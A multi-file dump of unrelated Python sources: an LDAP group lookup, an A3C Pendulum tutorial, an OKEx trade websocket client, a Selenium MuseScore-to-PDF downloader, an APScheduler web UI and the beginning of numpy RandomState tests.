"""Connects to LDAP and raises a subclass of LDAPOperationResult when it fails"""
tls_config = ldap3.Tls(
validate=ssl.CERT_REQUIRED, ca_certs_file="/etc/ssl/certs/ca-certificates.crt"
)
server = ldap3.Server(ldap_host, use_ssl=True, tls=tls_config)
conn = ldap3.Connection(
server, user=username, password=password, raise_exceptions=True
)
conn.bind()
search_filter = f"(&(memberOf=CN={cn},{search_ou})(!(userAccountControl=514)))"
entries = conn.extend.standard.paged_search(
search_base=search_base,
search_scope=ldap3.SUBTREE,
search_filter=search_filter,
attributes=["sAMAccountName"],
paged_size=1000,
time_limit=10,
)
return {entry["attributes"]["sAMAccountName"] for entry in entries}
def _reorder_docker_volumes(volumes: List[DockerVolume]) -> List[DockerVolume]:
deduped = {
v["containerPath"].rstrip("/") + v["hostPath"].rstrip("/"): v for v in volumes
}.values()
return sort_dicts(deduped)
|
A3C_continuous_action.py
|
"""
Asynchronous Advantage Actor Critic (A3C) with continuous action space, Reinforcement Learning.
The Pendulum example.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
GAME = 'Pendulum-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_EP_STEP = 200
MAX_GLOBAL_EP = 2000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.01
LR_A = 0.0001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
mu, sigma = mu * A_BOUND[1], sigma + 1e-4
normal_dist = tf.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his)
exp_v = log_prob * tf.stop_gradient(td)
entropy = normal_dist.entropy() # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1), axis=[0, 1]), A_BOUND[0], A_BOUND[1])
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return mu, sigma, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
for ep_t in range(MAX_EP_STEP):
# if self.name == 'W_0':
# self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
done = True if ep_t == MAX_EP_STEP - 1 else False
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append((r+8)/8) # normalize
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.9 * GLOBAL_RUNNING_R[-1] + 0.1 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
okex.py
|
# Import Built-Ins
import logging
import json
import threading
import time
# Import Third-Party
from websocket import create_connection, WebSocketTimeoutException,WebSocketConnectionClosedException
import requests
# Import Homebrew
from bitex.api.WSS.base import WSSAPI
from datetime import datetime
# Init Logging Facilities
log = logging.getLogger(__name__)
import zlib #压缩相关的库
class OkexWSS(WSSAPI):
def __init__(self,pair="XBTUSD"):
super(OkexWSS, self).__init__('wss://real.okex.com:10441/websocket', 'Okex')
self.conn = None
self.pairs = [pair.upper()]
self._data_thread = None
def start(self):
super(OkexWSS, self).start()
self._data_thread = threading.Thread(target=self._process_data)
self._data_thread.daemon = True
self._data_thread.start()
def stop(self):
if self.running:
super(OkexWSS, self).stop()
if self._data_thread:
self._data_thread.join()
self._data_thread = None
# 解压函数
def inflate(self,data):
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
inflated = decompress.decompress(data)
inflated += decompress.flush()
return inflated
def _process_data(self):
self.conn = create_connection(self.addr)
payload = json.dumps({'event':'addChannel','channel':'ok_sub_spot_btc_usdt_deals'})
self.conn.send(payload)
while self.running:
try:
message = self.conn.recv()
inflated = self.inflate(message).decode('utf-8') # 将okex发来的数据解压
data_arr = json.loads(inflated)
log.debug(data_arr)
except (WebSocketTimeoutException, ConnectionResetError,WebSocketConnectionClosedException):
log.warning("restarted")
self._controller_q.put('restart')
time.sleep(3)
except Exception as e:
log.exception(e)
# {'table': 'trade', 'action': 'insert', 'data': [
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 28999,
# 'price': 3826.5, 'tickDirection': 'PlusTick', 'trdMatchID': '7d5089d5-486b-37cf-9b4c-0366e76f1ffc',
# 'grossValue': 757859866, 'homeNotional': 7.57859866, 'foreignNotional': 28999},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 7500,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '3a374212-dc3c-4b2b-eb3b-10fc270cfb7a',
# 'grossValue': 196005000, 'homeNotional': 1.96005, 'foreignNotional': 7500},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 40,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': 'a586232f-e634-bb4a-db90-4af1f73481c1',
# 'grossValue': 1045360, 'homeNotional': 0.0104536, 'foreignNotional': 40},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 40,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': 'f93e0576-5cd2-35a5-0bf6-50d5361f01db',
# 'grossValue': 1045360, 'homeNotional': 0.0104536, 'foreignNotional': 40},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 10000,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '74c8bddb-d264-0fec-ae24-1bbe11263cae',
# 'grossValue': 261340000, 'homeNotional': 2.6134, 'foreignNotional': 10000},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 36000,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '6395d9a1-64cb-4ad4-4710-a60d0db8d770',
# 'grossValue': 940824000, 'homeNotional': 9.40824, 'foreignNotional': 36000},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 10000,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '8816e23f-0d6d-5993-40a8-8aa3f331b806',
# 'grossValue': 261340000, 'homeNotional': 2.6134, 'foreignNotional': 10000},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 5000,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '263cb99d-983d-abc4-05e0-1b337a700495',
# 'grossValue': 130670000, 'homeNotional': 1.3067, 'foreignNotional': 5000},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 30336,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': 'a7bf787b-14ad-4778-e3c2-c58a7928a6fe',
# 'grossValue': 792801024, 'homeNotional': 7.92801024, 'foreignNotional': 30336}]}
for data in data_arr:
if 'channel' in data:
type = data['channel']
# reason = data['reason']
if type == 'ok_sub_spot_btc_usdt_deals':
tradedatas = data['data']
for tradedata in tradedatas:
log.debug(tradedata)
amount = float(tradedata[2])
if tradedata[4] == "ask":
amount = -amount
date_str = (tradedata[3])
# //2018-12-03T14:38:33.665000Z
ts = datetime.strptime(date_str, '%H:%M:%S')
now = datetime.now()
ts = ts.replace(year=now.year,month=now.month,day=now.day)
timestamp = (ts - datetime(1970, 1, 1)).total_seconds()
# print("ts %s" % timestamp)
self.data_q.put(('trades',
timestamp, amount, float(tradedata[1]),))
self.conn = None
|
musescore.py
|
from selenium.webdriver.common.keys import Keys
from selenium import webdriver
from bs4 import BeautifulSoup
from cairosvg.surface import PDFSurface
from cairosvg.parser import Tree
from cairosvg import svg2pdf
from typing import Union, Optional
from io import BytesIO
from tqdm import tqdm
# import proxyscrape
import threading
import cairocffi
import requests
import cairo
import json
import time
import os
class PageNotFound(Exception):
pass
def download(user: Optional[Union[int, str]] = None,
score: Optional[Union[int, str]] = None,
url: Optional[str] = None,
dpi: int = 40):
def fetch(src):
nonlocal results, pbar
resp = requests.get(src, stream = True)
data = resp.content
try:
surf = PDFSurface(Tree(bytestring = data), None, dpi)
except:
surf = cairo.ImageSurface.create_from_png(BytesIO(data))
results[src] = surf
pbar.update(1)
if url is None:
if user is None:
url = f"https://musescore.com/score/{score}"
else:
url = f"https://musescore.com/user/{user}/scores/{score}"
if not os.path.exists('scores'):
os.mkdir('scores')
# collector = proxyscrape.create_collector('default', 'http')
# proxy = collector.get_proxy({'country': 'united states', 'anonymous': True})
try:
options = webdriver.ChromeOptions()
options.headless = True
options.add_argument("--window-size=1920,1080")
# options.add_argument(f'--proxy-server={proxy.host}:{proxy.port}')
driver = webdriver.Chrome(options = options)
driver.get(url)
resp = requests.get(url)
if resp.status_code == 404:
raise PageNotFound("The score could not be found.")
while True:
try:
title = driver.find_element_by_class_name('_3ke60').text
pages = len(driver.find_element_by_class_name('JQKO_').find_elements_by_xpath("*")) - 2
fpath = os.path.join('scores', title + '.pdf')
break
except KeyboardInterrupt:
break
except Exception as e:
time.sleep(0.1)
continue
surface = cairocffi.PDFSurface(fpath, 1, 1)
context = cairocffi.Context(surface)
urls = []
pbar = tqdm(desc = 'Fetching URLs to svg image of each page in score', total = pages, leave = False)
for page in range(pages):
driver.execute_script(f'document.getElementsByClassName("vAVs3")[{page}].scrollIntoView()')
sheet = driver.find_elements_by_class_name('vAVs3')[page]
while True:
try:
src = sheet.find_elements_by_xpath("*")[0].get_attribute('src')
if src is None:
continue
urls.append(src)
pbar.update(1)
break
except KeyboardInterrupt:
break
except:
continue
results = {}
threads = []
pbar = tqdm(desc = 'Fetching image contents', total = pages, leave = False)
for src in urls:
thread = threading.Thread(target = fetch, args = (src,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
for src in tqdm(urls, 'Constructing PDF', leave = False):
image_surface = results[src]
surface.set_size(image_surface.width, image_surface.height)
context.set_source_surface(image_surface.cairo, 0, 0)
context.paint()
surface.show_page()
except:
os.remove(fpath)
finally:
try:
surface.finish()
except:
pass
try:
driver.close()
except:
pass
|
web.py
|
import logging
import threading
from datetime import datetime
import flask
import flask_socketio
from apscheduler.jobstores.base import JobLookupError
from apscheduler.triggers.cron import CronTrigger
from apscheduler.triggers.interval import IntervalTrigger
from flask import Response
from apschedulerui.watcher import SchedulerWatcher, SchedulerEventsListener
from apschedulerui.patch import patch_scheduler
class SchedulerUI(SchedulerEventsListener):
"""
A web server that monitors your scheduler and serves a web application to visualize events.
By the default the server web application served is a view-only UI, but by enabling capabilities it may be allowed
to control the scheduler and its jobs.
Args:
scheduler (apscheduler.schedulers.base.BaseScheduler):
The scheduler to monitor.
capabilities (dict):
(Optional)
A dictionary of the capabilities to enable in the server and client. By default the UI is view-only.
Supported capabilities:
* Pause/Resume Scheduler: set `pause_scheduler` to :data:`True`.
* Pause/Resume Jobs: set `pause_job` to :data:`True`.
* Remove Jobs: set `remove_job` to :data:True.
operation_timeout (float):
(Optional) The amount of seconds to wait for the serializing lock when performing actions on the
scheduler or on its jobs from the UI.
Basic Usage:
>>> from apscheduler.schedulers.background import BackgroundScheduler
>>> from apschedulerui.web import SchedulerUI
>>> scheduler = BackgroundScheduler()
>>> ui = SchedulerUI(scheduler)
>>> ui.start() # Server available at localhost:5000.
Configuring capabilities:
>>> ui = SchedulerUI(scheduler, capabilities={'pause_scheduler': True}) # All omitted capabilities are False.
>>> ui = SchedulerUI(scheduler, capabilities={'pause_job': True, 'remove_job': True})
"""
def __init__(self, scheduler, capabilities=None, operation_timeout=1):
self.scheduler = scheduler
patch_scheduler(scheduler)
self.capabilities = {
'pause_job': False,
'remove_job': False,
'pause_scheduler': False,
'stop_scheduler': False,
'run_job': False,
}
if not (isinstance(operation_timeout, int) or isinstance(operation_timeout, float)):
raise TypeError('operation_timeout should be either an int or a float')
if operation_timeout <= 0:
raise ValueError('operation_timeout should be a positive number')
self.operation_timeout = operation_timeout
if capabilities is not None:
if isinstance(capabilities, dict):
self.capabilities.update(capabilities)
else:
raise TypeError('capabilities should be a dict of str -> bool pairs')
self._scheduler_listener = SchedulerWatcher(scheduler)
self._web_server = flask.Flask(__name__)
self._socket_io = None
try:
# TODO: see if we can support eventlet in the future.
self._socket_io = flask_socketio.SocketIO(self._web_server, async_mode='gevent')
except ValueError:
self._socket_io = flask_socketio.SocketIO(self._web_server, async_mode='threading')
self._init_endpoints()
self._web_server_thread = None
self._scheduler_lock = threading.Lock()
def start(self, host='0.0.0.0', port=5000, daemon=True):
"""
Starts listening for events from the scheduler and starts the web server that serves the UI in a new thread.
Args:
host (str):
(Optional) The address to bind the web server to. Default `0.0.0.0`.
port (int):
(Optional) The port to which the web server will bind. Defaults to :data:`5000`.
daemon (bool):
(Optional) If :data:`True` (default) starts the server as daemon.
"""
self._scheduler_listener.add_listener(self)
self._web_server_thread = threading.Thread(target=self._start, name='apscheduler-ui', args=(host, port))
self._web_server_thread.daemon = daemon
self._web_server_thread.start()
def _init_endpoints(self):
if self.capabilities.get('pause_scheduler', False):
self._web_server.add_url_rule(
'/api/scheduler/pause', 'pause_scheduler', self._pause_scheduler, methods=['POST']
)
self._web_server.add_url_rule(
'/api/scheduler/resume', 'resume_scheduler', self._resume_scheduler, methods=['POST']
)
if self.capabilities.get('stop_scheduler', False):
self._web_server.add_url_rule(
'/api/scheduler/stop', 'stop_scheduler', self._stop_scheduler, methods=['POST']
)
self._web_server.add_url_rule(
'/api/scheduler/start', 'start_scheduler', self._start_scheduler, methods=['POST']
)
if self.capabilities.get('remove_job', False):
self._web_server.add_url_rule('/api/job/<job_id>/remove', 'remove_job', self._remove_job, methods=['POST'])
if self.capabilities.get('pause_job', False):
self._web_server.add_url_rule('/api/job/<job_id>/pause', 'pause_job', self._pause_job, methods=['POST'])
self._web_server.add_url_rule('/api/job/<job_id>/resume', 'resume_job', self._resume_job, methods=['POST'])
if self.capabilities.get('run_job', False):
self._web_server.add_url_rule('/api/job/<job_id>/run_now', 'run_job', self._run_job, methods=['POST'])
self._web_server.add_url_rule('/', 'index', self._index, defaults={'path': ''})
self._web_server.add_url_rule('/<path:path>', 'index', self._index)
self._socket_io.on_event('connected', self._client_connected)
def _index(self, path):
return self._web_server.send_static_file('index.html')
def _exec_scheduler_command(self, func, *args, **kwargs):
if self._scheduler_lock.acquire(timeout=self.operation_timeout):
try:
func(*args, **kwargs)
return 'ok'
except JobLookupError:
flask.abort(404, description="Job not found")
finally:
self._scheduler_lock.release()
else:
flask.abort(408, description="Failed to acquire scheduler lock to perform operation")
def _pause_scheduler(self):
return self._exec_scheduler_command(self.scheduler.pause)
def _resume_scheduler(self):
return self._exec_scheduler_command(self.scheduler.resume)
def _stop_scheduler(self):
return self._exec_scheduler_command(self.scheduler.shutdown, wait=False)
def _start_scheduler(self):
return self._exec_scheduler_command(self.scheduler.start)
def _pause_job(self, job_id):
return self._exec_scheduler_command(self.scheduler.pause_job, job_id)
def _resume_job(self, job_id):
return self._exec_scheduler_command(self.scheduler.resume_job, job_id)
def _run_job(self, job_id, next_run_time=None):
logging.getLogger('apschedulerui').info('Running job %s' % job_id)
if not job_id:
return Response(status=404)
if not next_run_time:
next_run_time = datetime.now()
def _run_job_impl():
job = self.scheduler.get_job(job_id)
if not job:
raise JobLookupError(job_id)
# If a job is periodic (has an interval trigger) it should be triggered by modifying the trigger it already
# has. Otherwise, it can be rescheduled to be ran now.
if isinstance(job.trigger, IntervalTrigger) or isinstance(job.trigger, CronTrigger):
self.scheduler.modify_job(job_id, next_run_time=next_run_time)
else:
job.reschedule(trigger='date', run_date=next_run_time)
return self._exec_scheduler_command(_run_job_impl)
def _remove_job(self, job_id):
return self._exec_scheduler_command(self.scheduler.remove_job, job_id)
def _client_connected(self):
logging.getLogger('apschedulerui').debug('Client connected')
flask_socketio.emit('init_jobs', self._scheduler_listener.scheduler_summary())
flask_socketio.emit('init_capabilities', self.capabilities)
def _job_event(self, event):
self._socket_io.emit('job_event', event)
def _scheduler_event(self, event):
self._socket_io.emit('scheduler_event', event)
def _jobstore_event(self, event):
self._socket_io.emit('jobstore_event', event)
def _executor_event(self, event):
self._socket_io.emit('executor_event', event)
def _start(self, host, port):
self._socket_io.run(self._web_server, host=host, port=port)
|
test_randomstate.py
|
import hashlib
import pickle
import sys
import warnings
import numpy as np
import pytest
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy.random import MT19937, PCG64
from numpy import random
INT_FUNCS = {'binomial': (100.0, 0.6),
'geometric': (.5,),
'hypergeometric': (20, 20, 10),
'logseries': (.5,),
'multinomial': (20, np.ones(6) / 6.0),
'negative_binomial': (100, .5),
'poisson': (10.0,),
'zipf': (2,),
}
if np.iinfo(int).max < 2**32:
# Windows and some 32-bit platforms, e.g., ARM
INT_FUNC_HASHES = {'binomial': '670e1c04223ffdbab27e08fbbad7bdba',
'logseries': '6bd0183d2f8030c61b0d6e11aaa60caf',
'geometric': '6e9df886f3e1e15a643168568d5280c0',
'hypergeometric': '7964aa611b046aecd33063b90f4dec06',
'multinomial': '68a0b049c16411ed0aa4aff3572431e4',
'negative_binomial': 'dc265219eec62b4338d39f849cd36d09',
'poisson': '7b4dce8e43552fc82701c2fa8e94dc6e',
'zipf': 'fcd2a2095f34578723ac45e43aca48c5',
}
else:
INT_FUNC_HASHES = {'binomial': 'b5f8dcd74f172836536deb3547257b14',
'geometric': '8814571f45c87c59699d62ccd3d6c350',
'hypergeometric': 'bc64ae5976eac452115a16dad2dcf642',
'logseries': '84be924b37485a27c4a98797bc88a7a4',
'multinomial': 'ec3c7f9cf9664044bb0c6fb106934200',
'negative_binomial': '210533b2234943591364d0117a552969',
'poisson': '0536a8850c79da0c78defd742dccc3e0',
'zipf': 'f2841f504dd2525cd67cdcad7561e532',
}
@pytest.fixture(scope='module', params=INT_FUNCS)
def int_func(request):
return (request.param, INT_FUNCS[request.param],
INT_FUNC_HASHES[request.param])
def assert_mt19937_state_equal(a, b):
assert_equal(a['bit_generator'], b['bit_generator'])
assert_array_equal(a['state']['key'], b['state']['key'])
assert_array_equal(a['state']['pos'], b['state']['pos'])
assert_equal(a['has_gauss'], b['has_gauss'])
assert_equal(a['gauss'], b['gauss'])
class TestSeed:
def test_scalar(self):
s = random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, -0.5)
assert_raises(ValueError, random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, [-0.5])
assert_raises(ValueError, random.RandomState, [-1])
assert_raises(ValueError, random.RandomState, [4294967296])
assert_raises(ValueError, random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, random.RandomState, np.array([],
dtype=np.int64))
assert_raises(ValueError, random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, random.RandomState, [[1, 2, 3],
[4, 5, 6]])
def test_cannot_seed(self):
rs = random.RandomState(PCG64(0))
with assert_raises(TypeError):
rs.seed(1234)
def test_invalid_initialization(self):
assert_raises(ValueError, random.RandomState, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.random_state = random.RandomState(self.seed)
self.state = self.random_state.get_state()
def test_basic(self):
old = self.random_state.tomaxint(16)
self.random_state.set_state(self.state)
new = self.random_state.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(self.state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.random_state.standard_normal()
state = self.random_state.get_state()
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.random_state.standard_normal(size=16)
self.random_state.set_state(old_state)
x2 = self.random_state.standard_normal(size=16)
self.random_state.set_state(self.state)
x3 = self.random_state.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.random_state.negative_binomial(0.5, 0.5)
def test_get_state_warning(self):
rs = random.RandomState(PCG64())
with suppress_warnings() as sup:
w = sup.record(RuntimeWarning)
state = rs.get_state()
assert_(len(w) == 1)
assert isinstance(state, dict)
assert state['bit_generator'] == 'PCG64'
def test_invalid_legacy_state_setting(self):
state = self.random_state.get_state()
new_state = ('Unknown', ) + state[1:]
assert_raises(ValueError, self.random_state.set_state, new_state)
assert_raises(TypeError, self.random_state.set_state,
np.array(new_state, dtype=object))
state = self.random_state.get_state(legacy=False)
del state['bit_generator']
assert_raises(ValueError, self.random_state.set_state, state)
def test_pickle(self):
self.random_state.seed(0)
self.random_state.random_sample(100)
self.random_state.standard_normal()
pickled = self.random_state.get_state(legacy=False)
assert_equal(pickled['has_gauss'], 1)
rs_unpick = pickle.loads(pickle.dumps(self.random_state))
unpickled = rs_unpick.get_state(legacy=False)
assert_mt19937_state_equal(pickled, unpickled)
def test_state_setting(self):
attr_state = self.random_state.__getstate__()
self.random_state.standard_normal()
self.random_state.__setstate__(attr_state)
state = self.random_state.get_state(legacy=False)
assert_mt19937_state_equal(attr_state, state)
def test_repr(self):
assert repr(self.random_state).startswith('RandomState(MT19937)')
class TestRandint:
rfunc = random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
